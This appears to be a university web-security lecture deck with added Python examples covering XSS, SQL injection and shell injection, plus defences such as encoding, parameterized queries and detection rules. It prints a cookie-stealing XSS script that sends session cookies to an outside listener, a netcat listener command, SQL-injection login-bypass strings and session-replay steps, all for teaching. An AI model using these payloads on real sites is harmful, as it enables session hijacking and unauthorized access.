Auditing Web Security

Objectives

Understand the complexity of Web infrastructure and current trends of Web threats

Understand the mechanisms and defenses of major Web attacks: XSS, SQL injection and shell attacks


Why Web Security: a Real Business Problem

> 60% of total attack attempts observed on the Net are against Web applications

> 80% of vulnerabilities discovered are in web apps

Independent security audit
Regulatory compliance


Anatomy of Web Attacks

1. Attacker breaks into a legitimate website and posts malware
   - Malware is no longer exclusive to malicious Web sites.
2. Attacking end-user machines.
   - Malware on a Web site makes its way down on to a user's machine when that user visits the host Web site.
   - "Drive-by download": happens automatically, with no user interaction required
   - Additional techniques do require some input from the user, but in practice are equally, if not more, effective.
3. Leveraging end-user machines for malicious activity.


Anatomy of Web Attacks (figure)

Source: Web Based Attacks, Symantec 2009


Web Applications

Big trend: software as a (Web-based) service
- Online banking, shopping, government, etc.
- Cloud computing
Applications hosted on Web servers
- Written in a mixture of PHP, Java, Perl, Python, C, ASP
Security is rarely the main concern
- Poorly written scripts with inadequate input validation
- Sensitive data stored in world-readable files


Typical Web Application Design

Runs on a Web server or application server
Takes input from Web users (via the Web server)
Interacts with back-end databases and third parties
Prepares and outputs results for users (via the Web server)
- Dynamically generated HTML pages
- Contain content from many different sources, often including regular users
  Blogs, social networks, photo-sharing websites...
  Web advertisements, usually third party
- A webpage can have content coming from 10-20 different domains


Two Sides of Web Security

Web browser (front end)
- Can be attacked by any website it visits
- Attacks lead to malware installation (keyloggers, botnets), document theft, loss of private data
Web application (back end)
- Runs at the website: banks, online merchants, blogs, Google Apps, etc.
- Written in JavaScript, PHP, ASP, JSP, Ruby, ...
- Many potential bugs: XSS, SQL injection, XSRF
- Attacks lead to stolen credit cards, defaced sites, etc.


Chicago Tribune Home Page (screenshot)


How Are Legitimate Web Sites Compromised?

1. SQL injection attacks
2. Malicious advertisements
   - Many Web sites today display advertisements hosted by third-party advertising sites
   - The volume of ads published automatically makes detection difficult
   - Random appearance further compounds the detection problem
3. Search engine result redirection
4. Attacks on the backend virtual hosting companies
5. Cross-site scripting (XSS) attacks
6. Vulnerabilities in the Web server or forum hosting software (e.g., shell attacks)


JavaScript

Language executed by the browser
- Scripts are embedded in Web pages
- Can run before the HTML is loaded, before the page is viewed, while it is being viewed or when leaving the page
Used to implement "active" web pages
- AJAX, a huge number of Web-based applications
Many security and correctness issues
- Attacker gets to execute some code on the user's machine
- Often used to exploit other vulnerabilities


Cross Site Scripting

Attacker goal: get their code into the victim's browser

XSS forces a website visitor to execute malicious code in his/her browser

Accounts for roughly 80% of all documented security vulnerabilities


XSS Risks

XSS abuses rendering engines or plug-ins
- Steal browser cookies
- Steal session info for a replay attack
- Malware or bot installation
- Redirect or phishing attempt


XSS Example 1

Trudy posts the following JavaScript on a message board:

    <script language="javascript">
    var url = "http://machineaddress:5000/index.html?cookie=" + encodeURI(document.cookie);
    new Image().src = url;   // the "image" request carries the cookie to Trudy's listener
    </script>

Then run a TCP server listening on port 5000 with e.g., nc -l 5000 (nc -l -p 5000 on traditional netcat)

When Bob views the posted message, his browser executes the malicious script, and his session cookie is sent to Trudy


XSS Demo Instructions

Set up a port forward to bypass the firewall:

    ssh -L 8000:netsec-demos:2000 [email protected]

Note: 8000 is the local port; it is forwarded to netsec-demos port 2000 through netsec-1

Use http://localhost:8000 to access http://netsec-demos.cs.northwestern.edu:2000


XSS Demo Instructions (II)

Log in as ychen and post the script with an attractive title (e.g., "hot game!"):

    <script language="javascript">
    var url = "http://cal.cs.northwestern.edu:5000/index.html?cookie=";
    url = url + encodeURI(document.cookie);
    new Image().src = url;
    </script>
    Hi Everyone! Thanks for your cookies!

Ssh to that machine (e.g., cal.cs.northwestern.edu) and run

    nc -l 5000


Simple XSS Code

    var url = "http://machineaddress:5000/index.html?cookie=" + encodeURI(document.cookie);

document.cookie is the browser's entire cookie string for the current website (every cookie the page can read; cookies flagged HttpOnly are not exposed to script)

encodeURI() is a JavaScript function that percent-encodes certain characters so the value can be included as part of a URL
- E.g., changing the space character to %20
- Keeps the URL well-formed and less suspicious-looking
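What the attacker's side of this demo receives is a raw HTTP request on the netcat listener. As an added example (not part of the original slides), the Python below parses one such captured request and recovers the stolen cookies and the page they came from. The request text, cookie names and values are constructed for illustration; the demo's real cookie layout is not shown on the slides.

```python
from urllib.parse import unquote, urlsplit

# Constructed sample (not from the slides): what `nc -l 5000` would print when the
# victim's browser loads the injected image URL. Cookie names/values are made up.
CAPTURED_REQUEST = (
    "GET /index.html?cookie=PHPSESSID=9f2c1ab7;%20user=bob;%20pw=5f4dcc3b5aa765d61d8327deb882cf99 HTTP/1.1\r\n"
    "Host: machineaddress:5000\r\n"
    "Referer: http://forum.example.edu/viewtopic.php?id=42\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "\r\n"
)


def parse_exfil_request(raw: str) -> dict:
    """Pull the exfiltrated cookie (and where it came from) out of one captured request.

    encodeURI() leaves '=', ';' and '&' untouched and only %-encodes spaces and a few
    other characters, so document.cookie arrives in the query string almost verbatim.
    The query is split by hand on '&' rather than with parse_qs(), because older
    Python versions also treated ';' as a separator and would shred the cookie string.
    """
    head, _, _body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)

    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()

    params = {}
    for pair in urlsplit(target).query.split("&"):
        name, _, value = pair.partition("=")   # first '=' only: the cookie value contains more
        params[unquote(name)] = unquote(value)

    # document.cookie is "name=value; name2=value2"; split it back into pairs.
    cookies = {}
    for part in params.get("cookie", "").split(";"):
        name, _, value = part.strip().partition("=")
        if name:
            cookies[name] = value

    return {
        "method": method,
        "victim_page": headers.get("referer", ""),   # the page carrying the injected script
        "cookies": cookies,
    }


if __name__ == "__main__":
    print(parse_exfil_request(CAPTURED_REQUEST))
```

The Referer header is worth keeping: it tells the auditor which page of the site is carrying the injected post, which is the first thing to clean up.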


What can the Attacker Do with the Cookie?

Another user (test458) logs in and, when viewing the post, their cookie is sent to the attacker

Crack Bob's password (the cookie carries an MD5 hash of it) offline with John the Ripper or any other password cracker

For more info, http://netsec.cs.northwestern.edu/resources/password-cracking/

Use a Firefox extension like TamperData to set your own cookies to Bob's values and impersonate him (a replay of the stolen session; the hash does not need to be cracked for this step)


XSS Detection

A client usually is not supposed to send scripts to servers

If the server receives <SCRIPT>... or its hex (percent-encoded) equivalent in an incoming request, and that same script is sent unsanitized in an outgoing response, then an attack has occurred
- A sanitized script would look like &lt;SCRIPT&gt;...

Any user input must be preprocessed (HTML-encoded) before it is used inside HTML
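The detection rule and the "preprocess before use in HTML" advice above, as an added Python example that is not from the original slides: a vulnerable and an encoded renderer for a forum post, plus the check that flags script arriving in a request and leaving unencoded in the response. The page template and the sample posts are constructed; the cookie-stealing payload is the one from the XSS example earlier in the deck.

```python
import html
import re
from urllib.parse import unquote

# Constructed page template (not from the slides): the forum echoes a posted
# message body back to every reader who opens the thread.
PAGE_TEMPLATE = '<html><body><div class="post">{body}</div></body></html>'

SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def render_unsafe(message: str) -> str:
    """The vulnerable pattern: user input pasted straight into HTML."""
    return PAGE_TEMPLATE.format(body=message)


def render_safe(message: str) -> str:
    """The fix the slide asks for: HTML-encode user input before it goes into the page.
    html.escape turns < > & " ' into entities, so a posted <script> renders as text."""
    return PAGE_TEMPLATE.format(body=html.escape(message, quote=True))


def request_carries_script(param_value: str) -> bool:
    """A browser form should never legitimately submit markup containing a script tag.
    Decode percent-encoding first so %3Cscript%3E is caught as well as <script>."""
    return SCRIPT_TAG.search(unquote(param_value)) is not None


def reflected_unsanitized(incoming_param: str, outgoing_body: str) -> bool:
    """The slide's rule: script arrived in the request AND the same script left in the
    response without being encoded. Literal string matching, so this is an IDS/WAF
    heuristic, not a substitute for encoding on output."""
    if not request_carries_script(incoming_param):
        return False
    return unquote(incoming_param) in outgoing_body


# Constructed sample traffic: a benign post and the cookie-stealing post from the
# slides, the latter both raw and percent-encoded as a browser would submit it.
BENIGN_POST = "hot game! see you all at 5pm"
XSS_POST = '<script>new Image().src="http://machineaddress:5000/?cookie="+encodeURI(document.cookie)</script>'
XSS_POST_ENCODED = (
    "%3Cscript%3Enew%20Image().src%3D%22http://machineaddress:5000/?cookie%3D%22"
    "%2BencodeURI(document.cookie)%3C/script%3E"
)


def audit(incoming_param: str) -> dict:
    """Run one submitted value through both renderers and report what the detector sees."""
    decoded = unquote(incoming_param)
    return {
        "script_in_request": request_carries_script(incoming_param),
        "unsafe_render_flagged": reflected_unsanitized(incoming_param, render_unsafe(decoded)),
        "safe_render_flagged": reflected_unsanitized(incoming_param, render_safe(decoded)),
    }


if __name__ == "__main__":
    for sample in (BENIGN_POST, XSS_POST, XSS_POST_ENCODED):
        print(audit(sample))
```

The same input trips the detector only when it is rendered by the unencoded path; once the body goes through html.escape the script tag survives only as text, which is exactly the &lt;SCRIPT&gt; form the slide describes as sanitized.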


SQL Injection

Malicious SQL statements run on the database and thus attack the server itself
- By contrast, XSS can only target other users of the site


SQL Injection Example

Trudy accesses Bob's website, which does not validate input on its sign-in form
- The form runs a SQL statement like the following:
  select username, user_password from minibbtable_users where user_password = md5('johnspassword') and username='johndoe';

Set username to ' or '1'='1 and the statement becomes:
  select username, user_password from minibbtable_users where user_password = md5('anyrandompassword') and username='' or '1'='1';

Effect: because AND binds tighter than OR, this picks any row where the username is blank and the password matches, or (since '1'='1' is always true) every row in the table.

Add "limit 1" to pick the first row (e.g., by ending the input with a comment marker such as -- so the trailing quote added by the application is ignored)


SQL Injection Detection

Input validation on any outgoing SQL statements from the web server to the database server
- Filter apostrophes, semicolons, percent symbols, hyphens, underscores, ...
- Any character that has special meaning must be escaped, e.g., convert ' into \'
  - Only works for string inputs
  - Different databases have different rules for escaping
- Check the data type (e.g., make sure it's an integer)
- Prepared statements with bound parameters sidestep the escaping rules entirely and are the preferred fix
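The sign-in query from the example above, run for real against an in-memory SQLite table so the injection, the "limit 1" variant, the escaping defence and bound parameters can be compared side by side. This is an added Python example, not code from the slides: the user table is constructed, Python's hashlib.md5 stands in for MySQL's md5() function (SQLite has none), and it goes one step beyond the slide by showing parameterized queries.

```python
import hashlib
import sqlite3

# Constructed user table mirroring the slide's minibbtable_users (names/passwords made up).
USERS = [("johndoe", "johnspassword"), ("alice", "correct horse")]


def md5_hex(text: str) -> str:
    """Stand-in for the MySQL md5() call in the slide's query (weak hash, kept for fidelity)."""
    return hashlib.md5(text.encode()).hexdigest()


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("create table minibbtable_users (username text, user_password text)")
    conn.executemany(
        "insert into minibbtable_users values (?, ?)",
        [(name, md5_hex(pw)) for name, pw in USERS],
    )
    return conn


def login_vulnerable(conn, username: str, password: str) -> list:
    """The slide's query built by string concatenation: attacker-controlled quotes change
    the WHERE clause. AND binds tighter than OR, so `... and username='' or '1'='1'`
    becomes (pw_matches AND user='') OR TRUE, i.e. every row."""
    sql = (
        "select username, user_password from minibbtable_users "
        f"where user_password = '{md5_hex(password)}' and username='{username}'"
    )
    return conn.execute(sql).fetchall()


def login_escaped(conn, username: str, password: str) -> list:
    """The slide's escaping defence. SQLite follows the SQL standard (double the quote);
    MySQL also accepts a backslash. Works only for string inputs and must match the
    target database's rules."""
    esc = username.replace("'", "''")
    sql = (
        "select username, user_password from minibbtable_users "
        f"where user_password = '{md5_hex(password)}' and username='{esc}'"
    )
    return conn.execute(sql).fetchall()


def login_parameterized(conn, username: str, password: str) -> list:
    """Bound parameters: the driver ships values separately from the statement text,
    so the input can never be parsed as SQL, whatever its type."""
    sql = (
        "select username, user_password from minibbtable_users "
        "where user_password = ? and username = ?"
    )
    return conn.execute(sql, (md5_hex(password), username)).fetchall()


if __name__ == "__main__":
    db = make_db()
    payload = "' or '1'='1"
    print(login_vulnerable(db, payload, "anyrandompassword"))      # every row
    print(login_vulnerable(db, payload + "' limit 1 -- ", "x"))    # first row only
    print(login_escaped(db, payload, "anyrandompassword"))         # []
    print(login_parameterized(db, payload, "anyrandompassword"))   # []
    print(login_parameterized(db, "johndoe", "johnspassword"))     # [('johndoe', <hash>)]
```

The "limit 1" payload works because the comment marker swallows the closing quote the application appends, so the application sees a single matched row and logs the attacker in as whoever comes first in the table.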


Shell Attacks

Control an actual machine such as a web server

Inject commands into scripts that use Linux utilities
- E.g., with ";" as the command separator in UNIX/Linux
CGI programs (e.g., in Perl) can invoke command-line programs (e.g., grep, ls)
Unsanitized input passed as arguments can lead to command execution.
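An added Python example (not from the slides) of the command-separator injection described above, next to the safe way to call a utility from a CGI-style script. It assumes a POSIX /bin/sh and uses echo rather than grep or ls so it runs without any input files; the injected text is constructed.

```python
import re
import subprocess


def search_vulnerable(pattern: str) -> str:
    """The slide's scenario: the user's search term is spliced into a command line and
    shell=True hands it to /bin/sh, so ';' in the input ends the intended command and
    starts the attacker's. (echo stands in for grep/ls; any utility behaves the same.)"""
    cmd = f"echo matching lines for {pattern}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def search_safe(pattern: str) -> str:
    """argv list, no shell: the pattern reaches the program as one argument, and
    ';', '|', '$(...)' and friends are just characters inside it."""
    return subprocess.run(
        ["echo", "matching lines for", pattern], capture_output=True, text=True
    ).stdout


# Allow-list validation: accept only what a search term legitimately needs.
ALLOWED_PATTERN = re.compile(r"[A-Za-z0-9_.-]{1,64}")


def is_safe_pattern(pattern: str) -> bool:
    return ALLOWED_PATTERN.fullmatch(pattern) is not None


def search_validated(pattern: str) -> str:
    """Belt and braces: reject suspicious input up front and still avoid the shell."""
    if not is_safe_pattern(pattern):
        raise ValueError("pattern contains characters outside the allow-list")
    return search_safe(pattern)


if __name__ == "__main__":
    evil = "foo; echo INJECTED"
    print(search_vulnerable(evil), end="")  # two lines: the intended one, then INJECTED
    print(search_safe(evil), end="")        # one line, with the ';' printed literally
```

Escaping the separator characters is the weaker alternative: the list of shell metacharacters is long and shell-specific, whereas not invoking a shell at all removes the parsing step the attack depends on.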


Defense Approaches

Web application firewall/IDS
- ModSecurity for Apache
- Commercial: SecureSphere from Imperva
Vulnerability scanning (these are black-box web scanners rather than static code analysis)
- Open source: Nikto
- Commercial: Acunetix Web Vulnerability Scanner, N-Stalker
Education on good coding
- HTML encoding of untrusted data when it is written into a page (server-side)
- Input validation/filtering


Getting onto a User's Computer

Source: Web Based Attacks, Symantec 2009


Automatic Attack Exposure

Techniques used to deliver malware from Web sites to a user's computer.

Exposure
- Browsing a website
- No user interaction is required
- Executable content is automatically downloaded


Social Engineering

Source: Web Based Attacks, Symantec 2009

• People are tricked into performing actions they would not otherwise want to perform


Types of Social Engineering Attacks

- Fake Codec
- Malicious Peer-to-Peer (P2P) Files
- Malicious Advertisements
- Fake Scanner Web Page
- Blog Spam
- Other Attack Vectors


Fake Codec

User is prompted to install a missing codec
Codec is actually malware
- Usually a trojan horse


Malicious Peer-to-Peer (P2P) Files

Malware authors bind malicious content into popular applications
- Files named after celebrities, popular bands
- Uploaded to popular P2P sites where they are downloaded by unsuspecting users
Openly available how-to materials on the internet
- Detail how to build and distribute malware
- Pay-per-install malware


Fake Scanner Web Page

Create a web site or product that misrepresents the truth
- JavaScript pop-ups notifying of a false need to install operating system updates
- Tools that claim to scan for and remove adult images, etc.

Source: Web Based Attacks, Symantec 2009


Blog Spam

Alluring links posted on blogs
- Links embedded in blog comments
- Direct users to sites that leverage social engineering tricks or browser exploits to spread malware


Other Attack Vectors

Spam
- Emails contain links directing people to drive-by download, fake scanner/codec, and malware sites
Pirated software sites
- Pirated versions of software are bundled with, or comprised solely of, trojan horses


Other Attack Vectors

What is a buffer overflow?

Attackers typically break into a remote system by exploiting some vulnerability of its software: a programming or configuration bug that makes it possible to subvert the software and have it execute unplanned instructions.

A buffer overflow occurs any time the program writes more data into a buffer than the space it has allocated for it in memory. This lets an attacker overwrite data that controls the program's execution path and hijack control of the program to execute the attacker's code instead of the process's own code.


How to Protect Yourself

Update and patch software
- Get the latest OS, browser and application patches
- Browser plug-in updates are often forgotten
Endpoint protection software
- Anti-virus software for signature-based detection and behavioral monitoring
- Keep the protection software subscription current
  - A lapsed subscription could miss 70,000 new unique virus variants in a single week
Be suspicious
- Avoid things that seem too good to be true
- Use the safe-search functionality in browsers
Adopt a strong password policy